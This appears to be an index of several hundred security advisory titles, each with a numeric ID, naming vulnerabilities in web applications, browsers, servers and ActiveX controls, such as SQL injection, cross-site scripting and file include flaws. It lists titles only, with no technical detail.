[31791] Calendars for the Web Security Bypass Vulnerability
[31776] WEB//NEWS Multiple SQL Injection Vulnerabilities
[31766] Symantec Altiris Deployment Solution Client User Interface Local Privilege Escalation Vulnerability
[31765] Microsoft Outlook Web Access for Exchange Server 'redir.asp' URI Redirection Vulnerability
[31762] PhpWebGallery 'comments.php' SQL Injection and Code Execution Vulnerabilities
[31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
[31755] Webscene eCommerce 'productlist.php' SQL Injection Vulnerability
[31746] Websense Reporter 'CreateDbInstall.log' Local Information Disclosure Vulnerability
[31740] ASP Indir Iltaweb Alisveris Sistemi 'xurunler.asp' SQL Injection Vulnerability
[31718] Apple Mac OS X Server Weblog Access Control List Security Bypass Vulnerability
[31703] Nokia Web Browser for S60 Infinite Array Sort Denial of Service Vulnerability
[31691] Sun Java System Web Proxy Server FTP Subsystem Heap Based Buffer Overflow Vulnerability
[31655] WebBiscuits Modules Controller Multiple Local and Remote File Include Vulnerabilities
[31645] Avaya Communication Manager Web Administration Multiple Security Vulnerabilities
[31639] Avaya Communication Manager Web Server Configuration Unauthorized Access Vulnerability
[31631] Opera Web Browser URI Redirection Remote Code Execution Vulnerability
[31596] MetaGauge Web Server Directory Traversal Vulnerability
[31595] PHP Web Explorer Multiple Local File Include Vulnerabilities
[31584] K9 Web Protection Authentication Bypass Vulnerabilities
[31573] JMweb 'src' Parameter Multiple Local File Include Vulnerabilities
[31562] Website Directory 'index.php' Cross-Site Scripting Vulnerability
[31544] OLIB7 WebView 'infile' Parameter Local File Include Vulnerability
[31543] Blue Coat WebFilter ICAP Patience Page Cross Site Scripting Vulnerability
[31524] H-Sphere WebShell 'actions.php' Multiple Cross Site Scripting Vulnerabilities
[31510] eZoneScripts Adult Banner Exchange Website 'click.php' SQL Injection Vulnerability
[31476] Mozilla Firefox User Interface Dispatcher Null Pointer Dereference Denial of Service Vulnerability
[31450] ParsaGostar ParsaWeb Multiple SQL Injection Vulnerabilities
[31425] PromoteWeb MySQL 'go.php' SQL Injection Vulnerability
[31424] Ultimate Webboard 'webboard.php' SQL Injection Vulnerability
[31414] IBM Tivoli Netcool/Webtop Privilege Escalation Vulnerability
[31412] Computer Associates Service Desk Web Forms Multiple Cross-Site Scripting Vulnerabilities
[31371] web-cp 'sendfile.php' Information Disclosure Vulnerability
[31353] WebPortal CMS 'index.php' Remote Code Execution Vulnerability
[31343] JETIK-WEB 'sayfa.php' SQL Injection Vulnerability
[31341] Sofi WebGUI 'modstart.php' Remote File Include Vulnerability
[31272] Epic Games Unreal Tournament 3 UT3 WebAdmin Directory Traversal Vulnerability
[31267] LooYu Web IM Cross Site Scripting Vulnerability
[31249] HyperStop WebHost Directory Database Disclosure Vulnerability
[31245] Kantan WEB Server Unspecified Directory Traversal Vulnerability
[31244] Kantan WEB Server Unspecified Cross Site Scripting Vulnerability
[31225] x10 Automatic MP3 Script 'web_root' Parameter Multiple Remote File Include Vulnerabilities
[31223] Mercurial hgweb 'allowpull' Information Disclosure Vulnerability
[31192] PreProjects Real Estate Website 'search.php' SQL Injection Vulnerability
[31186] IBM WebSphere Application Server 'FileServing' Feature Unspecified Vulnerability
[31183] Opera Web Browser Unicode Whitespace Cross-Site Scripting Weakness
[31156] WebPortal CMS 'download.php' SQL Injection Vulnerability
[31153] WebCMS Portal Edition Multiple Input Validation Vulnerabilities
[31142] Sports Clubs Web Panel 'id' Parameter Multiple SQL Injection Vulnerabilities
[31128] Sports Clubs Web Panel 'index.php' Local File Include Vulnerability
[31123] PhpWebGallery Local File Include and Cross-Site Scripting Vulnerabilities
[31096] Peachtree Accounting 'PAWWeb11.ocx' ActiveX Control Insecure Method Vulnerability
[31061] Apple iPhone and iPod touch Safari WebKit 'alert()' Function Remote Denial of Service Vulnerability
[31028] eZoneScripts Dating Website Remote File Upload Vulnerability
[31006] Webservice-DIC shop_v50 And shop_v52 Multiple Cross-Site Scripting Vulnerabilities
[30996] aspWebAlbum Multiple Input Validation Vulnerabilities
[30992] @Mail and @Mail WebMail Multiple Cross-Site Scripting Vulnerabilities
[30950] WeBid 'config.php' Arbitrary File Upload Vulnerability
[30946] Websens CMSbright 'page.php' SQL Injection Vulnerability
[30945] WeBid Multiple Input Validation Vulnerabilities
[30941] SourceWorkshop Web directory script 'index.php' SQL Injection Vulnerability
[30867] Mono 'System.Web' HTTP Header Injection Vulnerability
[30833] Civic Website Manager Multiple Cross-Site Scripting Vulnerabilities
[30822] PHP-Ultimate Webboard 'admindel.php' Multiple Input Validation Vulnerabilities
[30807] Web Directory Script 'listing_view.php' SQL Injection Vulnerability
[30792] Trend Micro Web Management Authentication Bypass Vulnerability
[30780] Fujitsu Web-Based Admin View Directory Traversal Vulnerability
[30778] webEdition CMS 'we_objectID' Parameter SQL Injection Vulnerability
[30768] Opera Web Browser 9.51 Multiple Security Vulnerabilities
[30745] K Web CMS 'sayfala.asp' SQL Injection Vulnerability
[30673] Meet#Web 'root_path' Parameter Multiple Remote File Include Vulnerabilities
[30671] Sun Java System Web Proxy Server FTP Subsystem Denial of Service Vulnerability
[30578] WebEx Meeting Manager 'atucfobj.dll' ActiveX Control Remote Buffer Overflow Vulnerability
[30572] Multiple WebmasterSite Products Remote Command Execution Vulnerability
[30545] Anzio Web Print Object ActiveX Control Remote Buffer Overflow Vulnerability
[30500] IBM WebSphere Portal Server Remote Administration Authentication Bypass Vulnerability
[30464] Blue Coat K9 Web Protection Centralized Server HTTP Responses Buffer Overflow Vulnerability
[30463] Blue Coat K9 Web Protection 'Referer' Header Stack Based Buffer Overflow Vulnerability
[30451] Sun Java System Web Server 7.0 Plugin for Sun N1SPS Remote Authentication Bypass Vulnerability
[30447] DEV Web Management System Multiple Input Validation Vulnerabilities
[30431] PhpWebGallery Information Disclosure Vulnerability
[30408] Web Wiz Rich Text Editor 'RTE_popup_link.asp' Cross Site Scripting Vulnerability
[30398] Web Wiz Forums 'mode' Parameter Multiple Cross-Site Scripting Vulnerabilities
[30383] phpwebnews-mysql Multiple SQL Injection Vulnerabilities
[30382] Mobius Web Publishing Software Multiple SQL Injection Vulnerabilities
[30343] EZWebAlbum Cookie Authentication Bypass Vulnerability
[30311] EZWebAlbum 'download.php' Local File Include Vulnerability
[30283] LunarNight Laboratory WebProxy Cross Site Scripting Vulnerability
[30280] IBM WebSphere Application Server 'PropFilePasswordEncoder' Unspecified Vulnerability
[30265] Citrix XenServer XenAPI HTTP Interfaces Cross-Site Scripting Vulnerability
[30247] Galatolo WebManager Cookie Authentication Bypass Vulnerability
[30237] Comdev Web Blogger 'arcmonth' Parameter SQL Injection Vulnerability
[30232] Galatolo Web Manager SQL Injection and Cross-Site Scripting Vulnerabilities
[30209] Maian Weblog 'weblog_cookie' Authentication Bypass Vulnerability
[30204] WebCMS Portal Edition 'index.php' SQL Injection Vulnerability
[30191] Apple Xcode WebObjects 'WOHyperlink' Information Disclosure Vulnerability
[30176] phpDatingClub 'website.php' Local File Include Vulnerability
[30164] V-webmail Multiple Remote File Include Vulnerabilities
[30162] V-webmail Multiple Remote File Include Vulnerabilities
[30151] Xerox CentreWare Web Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
[30148] Sun Java Web Start Multiple Vulnerabilities
[30130] Microsoft Outlook Web Access for Exchange Server Email Field Cross-Site Scripting Vulnerability
[30117] WebXell Editor 'upload_pictures.php' Arbitrary File Upload Vulnerability
[30080] phpwebnews 'bukutamu.php' SQL Injection Vulnerability
[30079] phpwebnews 'index.php' SQL Injection Vulnerability
[30078] Microsoft Outlook Web Access for Exchange Server HTML Parsing Cross-Site Scripting Vulnerability
[30074] WebBlizzard CMS 'index.php' SQL Injection Vulnerability
[30068] Opera Web Browser Remote Code Execution and Information Disclosure Vulnerabilities
[30060] Joomla! and Mambo Brightcode Weblinks Component 'catid' Parameter SQL Injection Vulnerability
[30027] Wordtrans-web Remote Arbitrary Shell Command Injection Vulnerability
[30006] Joomla! and Mambo 'com_xewebtv' Component 'id' Parameter SQL Injection Vulnerability
[29971] Keller Web Admin 'action' Parameter Local File Include Vulnerability
[29970] EasySiteNetwork Cheats Complete Website 'item.php' SQL Injection Vulnerability
[29969] EasySiteNetwork Drinks Complete Website 'drink.php' SQL Injection Vulnerability
[29968] EasySiteNetwork Jokes Complete Website 'joke.php' SQL Injection Vulnerability
[29967] EasySiteNetwork Tips Complete Website 'tip.php' SQL Injection Vulnerability
[29966] EasySiteNetwork Riddles Complete Website 'riddle.php' SQL Injection Vulnerability
[29930] Webdevindo-CMS 'hal' Parameter SQL Injection Vulnerability
[29927] WebGUI Collaboration RSS Information Disclosure Vulnerability
[29836] Apple Safari WebKit JavaScript Arrays Remote Buffer Overflow Vulnerability
[29813] Academic Web Tools CMS 1.4.2.8 Multiple Input Validation Vulnerabilities
[29806] Easy Webstore 'index.php' SQL Injection Vulnerability
[29804] nweb2fax Multiple Remote Vulnerabilities
[29795] aspWebCalendar 'calendar_admin.asp' Arbitrary File Upload Vulnerability
[29783] WebCalendar 'tools/send_reminders.php' Remote File Include Vulnerability
[29753] NITRO Web Gallery 'albums.php' SQL Injection Vulnerability
[29748] Webmatic Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
[29721] Advanced Webhost Billing System 'news.php' SQL Injection Vulnerability
[29713] PHP JOBWEBSITE PRO 'JobSearch3.php' SQL Injection Vulnerability
[29711] WebChamado 'lista_anexos.php' SQL Injection Vulnerability
[29701] WebChamado 'admin/corpo.php' Unauthorized Access Vulnerability
[29690] Xerox Multiple Copier/Printer Models Web Server Unspecified HTML Injection Vulnerability
[29689] Xerox WorkCentre Webserver Unspecified HTML Injection Vulnerability
[29684] Opera Web Browser 9.27 Multiple Security Vulnerabilities
[29612] Real Estate Website 'location.asp' Multiple Input Validation Vulnerabilities
[29610] RETIRED: Kronos webTA Project Management Module Multiple HTML Injection Vulnerabilities
[29595] Galatolo WebManager 'com' Parameter Local File Include Vulnerability
[29587] Akamai Red Swoosh Client Web Server Cross-Site Request Forgery Vulnerability
[29580] WEBalbum 'photo_add-c.php' HTML Injection Vulnerability
[29558] BackWeb 'LiteInstActivator.dll' ActiveX Control Buffer Overflow Vulnerability
[29545] BitKinex FTP LIST and WebDAV PROPFIND Commands Multiple Directory Traversal Vulnerabilities
[29543] IBM WebSphere Application Server SOAP Security Header Unspecified Vulnerability
[29501] Apple Mac OS X Image Capture Webserver Directory Traversal Vulnerability
[29496] SMEWeb SQL Injection and Multiple Cross-Site Scripting Vulnerabilities
[29436] Kent WEB MART Unspecified Cross Site Scripting Vulnerability
[29355] Sun Java System Web Server Advanced Search Mechanism Cross-Site Scripting Vulnerability
[29332] Simpel Side Weblosninger SQL Injection and Cross-Site Scripting Vulnerabilities
[29317] SAP Web Application Server '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting Vulnerability
[29311] IBM Lotus Domino Web Server Unspecified Cross Site Scripting Vulnerability
[29310] IBM Lotus Domino Web Server 'Accept Language' HTTP Header Buffer Overflow Vulnerability
[29296] Web Slider 'slide' Parameter SQL Injection Vulnerability
[29266] CMS WebManager-Pro Multiple SQL Injection Vulnerabilities
[29263] How2ASP.net Webboard 'showQAnswer.asp' SQL Injection Vulnerability
[29257] Archangel Management Weblog 'index.php' SQL Injection Vulnerability
[29256] StanWeb CMS 'default.asp' SQL Injection Vulnerability
[29246] Web Slider 'admin' Cookie Parameter Authentication Bypass Vulnerability
[29194] Symantec Altiris Deployment Solution Agent User Interface Local Privilege Escalation Vulnerability
[29188] WGCC Web Group Communication Center Cross-Site Scripting and SQL Injection Vulnerabilities
[29121] Microsoft Outlook Web Access 'no-store' HTTP Directive Information Disclosure Weakness
[29115] myWebland miniBloggie 'del.php' Security Bypass Vulnerability
[29088] Sun Java System Application Server and Web Server JSP Information Disclosure Vulnerability
[29087] Sun Java System Web Server Search Module Cross-Site Scripting Vulnerability
[29061] Intesync LLC Miniweb 2.0 Blog Writer Module 'historymonth' Parameter SQL Injection Vulnerability
[29031] WebMod Multiple Remote Security Vulnerabilities
[29011] Apple Safari WebKit Unspecified Heap Overflow Vulnerability
[29000] Joomla! and Mambo Webhosting Component 'catid' Parameter SQL Injection Vulnerability
[28997] IBM WebSphere Application Server Java Plugin Security Bypass Vulnerability
[28988] WebGUI Data Form Unspecified Security Vulnerability
[28971] Softbiz Web Host Directory Script 'search_result.php' SQL Injection Vulnerability
[28921] Web Calendar Pro 'one_day.php' SQL Injection Vulnerability
[28907] RSA Authentication Agent for Web URI Redirection Vulnerability
[28898] Horde Webmail 'addevent.php' Cross-Site Scripting Vulnerability
[28895] Akiva WebBoard HTML Injection Vulnerability
[28850] Voice of Web AllMyGuests 'AMG_id' SQL Injection Vulnerability
[28848] Azureus HTML WebUI Cross-Site Request Forgery Vulnerability
[28847] uTorrent WebUI Cross-Site Request Forgery Vulnerability
[28838] Grape Web Statistics 'functions.php' Remote File Include Vulnerability
[28815] Apple Safari WebKit JavaScript Regular Expression Repetition Counts Buffer Overflow Vulnerability
[28814] Apple Safari WebKit URI Handling Cross-Site Scripting Vulnerability
[28729] EMC DiskXtender MediaStor RPC Interface Format String Vulnerability
[28721] WinWebMail IMAP Login Data Handling Denial Of Service Vulnerability
[28693] Squid Web Proxy Cache 'arrayShrink()' Remote Denial of Service Vulnerability
[28647] OTRS SOAP Interface Security Bypass Vulnerability
[28631] Web Server Creator 'langfile' Parameter Remote File Include Vulnerability
[28628] Interwoven WorkSite Web 'iManFile.cab' TransferCtrl Class ActiveX Control Double Free Vulnerability
[28602] Borland StarTeam Multicast Service 'GMWebHandler::parse_request()' Buffer Overflow Vulnerability
[28600] Secure Computing Webwasher Malformed URL Remote Denial of Service Vulnerability
[28597] Drupal Webform Module Multiple Unspecified HTML Injection Vulnerabilities
[28593] Parallels Virtuozzo Containers VZPP Interface Change Pass Cross-Site Request Forgery Vulnerability
[28589] Parallels Virtuozzo Containers VZPP Interface File Manager Cross-Site Request Forgery Vulnerability
[28585] Opera Web Browser 9.26 Multiple Security Vulnerabilities
[28534] Neat weblog 'articleId' Parameter SQL Injection Vulnerability
[28515] mx_blogs Weblogs Module for mxBB 'mx_root_path' Parameter Remote File Include Vulnerability
[28492] Apple Safari WebKit 'calculateCompiledPatternLength()' Remote Code Execution Vulnerability
[28476] JAF CMS 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities
[28436] Aeries Browser Interface Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
[28425] HIS WebShop 'his-webshop.pl' Directory Traversal Vulnerability
[28416] F5 Big-IP Web Management Audit Log HTML Injection Vulnerability
[28400] My Web Doc Administration Pages Multiple Authentication Bypass Vulnerabilities
[28393] Webutil 'webutil.pl' Multiple Remote Command Execution Vulnerabilities
[28356] Apple Safari CFNetwork Arbitrary Secure Website Spoofing Vulnerability
[28347] Apple Safari Web Inspector Remote Code Injection Vulnerability
[28342] Apple Safari WebKit Frame Method Cross-Site Scripting Vulnerability
[28338] Apple Safari WebKit JavaScript Regular Expression Handling Buffer Overflow Vulnerability
[28337] Apple Safari WebCore History Object Cross-Site Scripting Vulnerability
[28336] Apple Safari WebCore 'document.domain' Variant Cross-Site Scripting Vulnerability
[28335] Apple Safari WebCore Java Frame Navigation Cross-Site Scripting Vulnerability
[28332] Apple Safari WebCore 'window.open()' Function Cross-Site Scripting Vulnerability
[28330] Apple Safari WebCore 'document.domain' Cross-Site Scripting Vulnerability
[28326] Apple Safari WebCore 'Kotoeri' Password Field Information Disclosure Vulnerability
[28307] CUPS CGI Interface Remote Buffer Overflow Vulnerability
[28294] webSPELL 'index.php' Cross-Site Scripting Vulnerability
[28280] WEBalbum 'photo_add.php' Security Bypass Vulnerability
[28277] RSA WebID 'IISWebAgentIF.dll' Cross-Site Scripting Vulnerability
[28256] eXV2 CMS WebChat Module 'roomid' Parameter SQL Injection Vulnerability
[28235] IBM WebSphere MQ for HP NonStop Security Bypass Vulnerability
[28216] IBM WebSphere Prior to 6.1.0.15 Multiple Vulnerabilities
[28207] Adobe ColdFusion Administration Interface Failed Login Audit Vulnerability
[28155] Sun Java Web Console Information Disclosure Weakness
[28148] Neptune Web Server 404 Error Page Cross Site Scripting Vulnerability
[28136] Microsoft Office Web Components ActiveX Control DataSource Remote Code Execution Vulnerability
[28135] Microsoft Office Web Components ActiveX Control URL Parsing Remote Code Execution Vulnerability
[28123] Ruby WEBrick Remote Directory Traversal and Information Disclosure Vulnerabilities
[28115] Xitex WebContent M1 'redirect.do' Cross-Site Scripting Vulnerability
[28107] WebCT Email and Discussion Board Messages HTML Injection Vulnerability
[28067] PHP WEB SCRIPT Dynamic Photo Gallery 'album.php' SQL Injection Vulnerability
[28046] IBM WebSphere MQ Security Bypass Vulnerability
[28037] Juniper Networks Secure Access 2000 Web Root Path Disclosure Vulnerability
[28023] D-Bus 'send_interface' Attribute Security Policy Bypass Vulnerability
[28006] Android Web Browser BMP File Integer Overflow Vulnerability
[28005] Android Web Browser GIF File Heap-Based Buffer Overflow Vulnerability
[27997] Rising Web Scan Object 'OL2005.dll' ActiveX Control Remote Code Execution Vulnerability
[27990] SurgeMail and WebMail 'Page' Command Remote Format String Vulnerability
[27989] PORAR Webboard 'question.asp' SQL Injection Vulnerability
[27962] Portail Web Php Multiple Remote And Local File Include Vulnerabilities
[27948] Citrix MetaFrame Web Manager 'login.asp' Cross-Site Scripting Vulnerability
[27901] Opera Web Browser 9.25 Multiple Security Vulnerabilities
[27894] PHP-Nuke Web_Links Module 'cid' Parameter SQL Injection Vulnerability
[27875] webcamXP Multiple Information Disclosure and Denial of Service Vulnerabilities
[27869] WebGUI Username HTML Injection Vulnerability
[27838] XPWeb 'Download.php' File Disclosure Vulnerability
[27826] Multiple Web Browser BMP Partial Palette Information Disclosure and Denial Of Service Vulnerability
[27797] artmedic webdesign weblog Multiple Local File Include Vulnerabilities
[27779] Site2Nite Real Estate Web 'agentlist.asp' Multiple SQL Injection Vulnerabilities
[27745] artmedic webdesign weblog Multiple Cross-Site Scripting Vulnerabilities
[27723] Softwebs Nepal Fast Chat 'loginprg.asp' Cross-Site Scripting Vulnerability
[27685] Website Meta Language Multiple Local Insecure Temporary File Creation Vulnerabilities
[27670] Microsoft Windows WebDAV Mini-Redirector Heap Overflow Vulnerability
[27665] IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Vulnerability
[27662] Webmin Search Feature Cross-Site Scripting Vulnerability
[27621] VHD Web Pack 'index.php' Local File Include Vulnerability
[27616] Portail Web Php 'site_path' Multiple Remote File Include Vulnerabilities
[27582] Novell GroupWise WebAccess Multiple Cross Site Scripting Vulnerabilities
[27580] Namo Web Editor 'NamoInstaller.dll' ActiveX Control Remote Buffer Overflow Vulnerability
[27517] webSPELL 'whoisonline.php' Cross-Site Scripting Vulnerability
[27461] WebCalendar Multiple HTML Injection and Cross-Site Scripting Vulnerabilities
[27453] Namo Web Editor 'NamoInstaller.dll' ActiveX Control Arbitrary Command Execution Vulnerability
[27433] IBM AIX WebSM Remote Client For Linux Local Insecure File Permissions Vulnerability
[27420] Web Wiz Rich Text Editor Arbitrary HTML File Creation Vulnerability
[27419] Multiple Web Wiz Products Remote Information Disclosure Vulnerability
[27405] EasySiteNetwork Recipe Website Script 'list.php' SQL Injection Vulnerability
[27400] IBM WebSphere Prior to 6.0.2.25 Multiple Remote Vulnerabilities
[27389] IBM WebSphere Business Modeler Repository Arbitrary File Deletion Vulnerability
[27383] Small Axe Weblog 'ffile' Parameter Remote File Include Vulnerability
[27371] IBM WebSphere Application Server serveServletsByClassnameEnabled Info Disclosure Vulnerability
[27364] 360 Web Manager 'form.php' SQL Injection Vulnerability
[27345] Small Axe Weblog 'linkbar.php' Remote File Include Vulnerability
[27338] Skype Web Content Zone Remote Code Execution Vulnerability
[27330] Site2Nite Real Estate Web 'default.asp' Multiple SQL Injection Vulnerabilities
[27319] MiniWeb Directory Traversal and Buffer Overflow Vulnerabilities
[27312] MailBee WebMail Pro 'download_view_attachment.aspx' Local File Include Vulnerability
[27261] Apple Safari KHTML WebKit Remote Denial of Service Vulnerability
[27223] Horde IMP and Groupware Webmail Edition Multiple Input Validation Vulnerabilities
[27202] PHP Webquest MySQL Credentials Information Disclosure Vulnerability
[27196] Tuned Studios Multiple Webpage Templates 'index.php' Remote File Include Vulnerability
[27193] Gateway CWebLaunchCtl ActiveX Control Command Execution and Remote Buffer Overflow Vulnerability
[27192] PHP Webquest 'soporte_horizontal_w.php' SQL Injection Vulnerability
[27147] SAM Broadcaster samPHPweb 'songinfo.php' SQL Injection Vulnerability
[27145] WebPortal CMS 'action.php' Unauthorized Access Vulnerability
[27137] SAM Broadcaster samPHPweb 'db.php' Remote File Include Vulnerability
[27106] DivX Web Player 'npUpload.dll' ActiveX Control Remote Denial of Service Vulnerability
[27092] AGENCY4NET WEBFTP 'download2.php' Local File Include Vulnerability
[27090] phpWebSite Search Module Cross-Site Scripting Vulnerability
[27088] WebPortal CMS 'index.php' SQL Injection Vulnerability
[27031] Web Sihirbazi 'default.asp' Multiple SQL Injection Vulnerabilities
[27013] Macrovision InstallShield Update Service 'isusweb.dll' Remote Buffer Overflow Vulnerability
[26984] Wallpaper Complete Website 'category.php' SQL Injection Vulnerability
[26978] Sun Java Web Proxy Server and Sun Java Web Server Multiple Cross-Site Scripting Vulnerabilities
[26972] IBM Lotus Domino Web Access ActiveX Control Memory Corruption Vulnerabilities
[26962] Aeries Browser Interface 'LostPwd.asp' SQL Injection Vulnerability
[26937] Opera Web Browser Multiple Security Vulnerabilities
[26916] iMesh 'IMWebControl' ActiveX Control Code Execution Vulnerability
[26915] Google Web Toolkit Benchmark Reporting System Unspecified Cross-Site Scripting Vulnerability
[26895] Ganglia Web Frontend Multiple Cross-Site Scripting Vulnerabilities
[26894] FreeWebshop Cookie Security Bypass Vulnerability
[26889] Black Sheep Web Software Form Tools Multiple Remote File Include Vulnerabilities
[26886] FreeWebshop Multiple SQL Injection Vulnerabilities
[26873] WebGUI Secondary Admin Security Bypass Vulnerability
[26861] Hitachi Web Server 'imagemap' Cross-Site Scripting Vulnerability
[26858] Hitachi Web Server DirectoryIndex Cross-Site Scripting Vulnerability
[26852] DynaWeb Developers MMS Gallery 'id' Parameter Multiple Directory Traversal Vulnerabilities
[26847] Websense User-Agent Spoofing Filtering Security Bypass Vulnerability
[26843] BEA WebLogic Mobility Server Image Converter Unspecified Unauthorized Access Vulnerability
[26821] Mcms Easy Web Make Template Parameter Local File Include Vulnerability
[26806] Perforce P4Web Content-Length Header Remote Denial Of Service Vulnerability
[26805] BarracudaDrive Web Server Denial of Service and Multiple Input Validation Vulnerabilities
[26800] Roundcube Webmail CSS Expression Input Validation Vulnerability
[26793] Websense Reporting Tools Login Page Cross-Site Scripting Vulnerability
[26787] webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities
[26779] Dominion Web DWdirectory Search Parameter SQL Injection Vulnerability
[26771] Easy File Sharing Web Server Directory Traversal and Multiple Information Disclosure Vulnerabilities
[26761] WebDoc Multiple SQL Injection Vulnerabilities
[26747] SERWeb Multiple Remote and Local File Include Vulnerabilities
[26734] IBM Lotus Sametime Server WebRunMenuFrame Cross-Site Scripting Vulnerability
[26721] Opera Web Browser Bitmap File RLE Remote Denial Of Service Vulnerability
[26686] Microsoft Web Proxy Auto-Discovery Proxy Spoofing Vulnerability
[26669] Multiple Vendor Web Browser JavaScript Multiple Fields Key Filtering Vulnerability
[26641] Web-MeetMe Play.PHP Multiple Local File Include Vulnerabilities
[26640] WebED Multiple Index.PHP Local File Include Vulnerabilities
[26628] eBASEweb Unspecified SQL Injection Vulnerability
[26584] Proverbs Web Calendar Password Parameter SQL Injection Vulnerability
[26563] WorkingOnWeb Events.PHP SQL Injection Vulnerability
[26515] FileMaker Instant Web Publishing Cross Site Scripting Vulnerability
[26501] Multiple Web Browsers SSL Certificate SubjectAltName Validation Weakness
[26464] AIDA Web Frame.HTML Multiple Unauthorized Access Vulnerabilities
[26457] IBM WebSphere Application Server WebContainer HTTP Request Header Security Weakness
[26441] IBM WebSphere MQ Multiple Unspecified Remote Memory Corruption Vulnerabilities
[26430] WebEx GPCContainer Memory Access Violation Multiple Denial of Service Vulnerabilities
[26424] RSA Authentication Agent IISWebAgentIF.DLL Remote Stack Based Buffer Overflow Vulnerability
[26419] VTLS Web Gateway Searchtype Parameter Cross-Site Scripting Vulnerability
[26405] Microsoft Office Web Component Memory Access Violation Denial of Service Vulnerability
[26375] Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Vulnerability
[26366] MyWebFTP Pass.PHP Hashed Password Information Disclosure Vulnerability
[26364] Cisco Unified MeetingPlace Web Conference Login Multiple Cross Site Scripting Vulnerabilities
[26358] Weblord.it MS-TopSites Unauthorized Access Vulnerability and HTML Injection Vulnerability
[26310] Firefly Media Server Webserver.C Multiple Format String Vulnerabilities
[26298] IBM Lotus Domino Web Server Unspecified Cross-Site Scripting Security Vulnerability
[26280] Macrovision InstallShield Update Service Isusweb.DLL Multiple Remote Code Execution Vulnerabilities
[26276] IBM WebSphere Application Server UDDI Console Multiple Input Validation Vulnerabilities
[26271] Hitachi Web Server HTML Injection Vulnerability and Signature Forgery Vulnerability
[26236] Gretech GOM Player GomWeb3.DLL Remote Buffer Overflow Vulnerability
[26207] Aleris Web Publishing Server Page.ASP SQL Injection Vulnerability
[26193] CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Vulnerability
[26166] Mono System.Web StaticFileHandler.CS Source Code Information Disclosure Vulnerability
[26165] The Online Web Library Site Scripture.PHP Remote File Include Vulnerability
[26164] WebIf Webif.exe Cross-Site Scripting Vulnerability
[26163] LiteSpeed Web Server Null-Byte Handling Information Disclosure Vulnerability
[26125] Drupal Weblinks Multiple Unspecified HTML Injection Vulnerabilities
[26102] Opera Web Browser Frame Functions Same Origin Policy Bypass Vulnerability
[26100] Opera Web Browser External Applications Arbitrary Code Execution Vulnerability
[26087] WebMod AUTH.W Cross-Site Scripting Vulnerability
[26078] IBM WebSphere Application Server Administrative Scripting Tools Unspecified Vulnerability
[26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
[26030] WebDesktop Multiple Remote File Include Vulnerabilities
[26013] Computer Associates eTrust ITM (Threat Manager) Web Console URI Redirection Vulnerability
[26004] Kaspersky Online Scanner KAVWebScan.DLL ActiveX Control Format String Vulnerability
[25999] Webmaster-Tips.net Joomla! RSS Feed Reader Remote File Include Vulnerability
[25988] Interstage Application Server Web Root Path Disclosure Vulnerability
[25981] NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities
[25975] TYPOlight webCMS preview.php Arbitrary File Download Vulnerability
[25959] Webmaster-Tips.net Joomla! WMT Portfolio Remote File Include Vulnerability
[25958] Webmaster-Tips.net Joomla! Flash Image Gallery Component Remote File Include Vulnerability
[25946] Webmaster-Tips.net Joomla! Panoramic Component Remote File Include Vulnerability
[25942] MailBee WebMail Pro Multiple Cross Site Scripting Vulnerabilities
[25940] Web Host Automation Helm Multiple Cross-Site Scripting Vulnerabilities
[25926] Deonix Web Templates Management Index.PHP SQL Injection Vulnerability
[25920] Sun Java WebStart Multiple File Access And Information Disclosure Vulnerabilities
[25814] Sun Solaris Human Interface Device Local Denial of Service Vulnerability
[25773] Webmin Unspecified Command Execution Vulnerability
[25767] GreenSQL Web Management Tool Multiple HTML Injection Vulnerabilities
[25757] Barracuda Spam Firewall Web Administration Console Username HTML Injection Vulnerability
[25751] Xunlei Web Thunder ActiveX Control DownURL2 Method Remote Buffer Overflow Vulnerability
[25745] PhpWebGallery Picture.PHP HTML Injection Vulnerability
[25744] WebBatch WebBatch.EXE Cross-Site Scripting and Information Disclosure Vulnerabilities
[25734] Sun Java Web Start dnsResolve ActiveX Control Buffer Overflow Vulnerability
[25689] TinyWebGallery Multiple Cross-Site Scripting Vulnerabilities
[25668] PHP Webquest Soporte_Derecha_W.PHP Parameter SQL Injection Vulnerability
[25626] IBM WebSphere Application Server Edge Component Unspecified Vulnerability
[25592] Webace Linkscript start.php SQL Injection Vulnerability
[25588] Buffalo AirStation WHR-G54S Web Management Cross-Site Request Forgery Vulnerability
[25535] WebOddity Web Server Directory Traversal Vulnerability
[25526] 212cafe Webboard Read.PHP SQL Injection Vulnerability
[25506] Weblogicnet Files_Dir Multiple Remote File Include Vulnerabilities
[25472] BEA WebLogic Server Null Cipher Suite Multiple Information Disclosure Vulnerabilities
[25406] Ripe Website Manager Multiple SQL and HTML Injection Vulnerabilities
[25390] Planet VC-200M VDSL2 Router Administration Interface Remote Denial Of Service Vulnerability
[25335] Systeme de vote pour site Web Multiple Remote File Include Vulnerabilities
[25331] Opera Web Browser Invalid Pointer Remote Code Execution Vulnerability
[25292] Prozilla Webring Website Script Category.PHP SQL Injection Vulnerability
[25261] WebCart Multiple Unspecified Cross-Site Scripting Vulnerabilities
[25257] Mapos-Scripts.de WebNews Multiple Remote File Include Vulnerabilities
[25237] Cisco Unified MeetingPlace Web Conference Multiple Cross Site Scripting Vulnerabilities
[25192] Xunlei Web Thunder ThunderServer.webThunder.1 ActiveX AddCategory File Download Vulnerability
[25190] Sun Java System Web Server Multiple HTTP Redirect Vulnerabilities
[25175] Open WebMail Multiple Cross-Site Scripting Vulnerabilities
[25166] WebDirector Index.PHP Cross Site Scripting Vulnerability
[25164] WikiWebWeaver Index.PHP Arbitrary File Upload Vulnerability
[25148] WebEvent Webevent.CGI Cross-Site Scripting Vulnerability
[25126] Novell GroupWise WebAccess User.Id Parameter Cross Site Scripting Vulnerability
[25115] Real Estate Listing Website Application Template Login Dialog SQL Injection Vulnerability
[25114] Pay Roll Time Sheet and Punch Card Application With Web UI Login.ASP SQL Injection Vulnerability
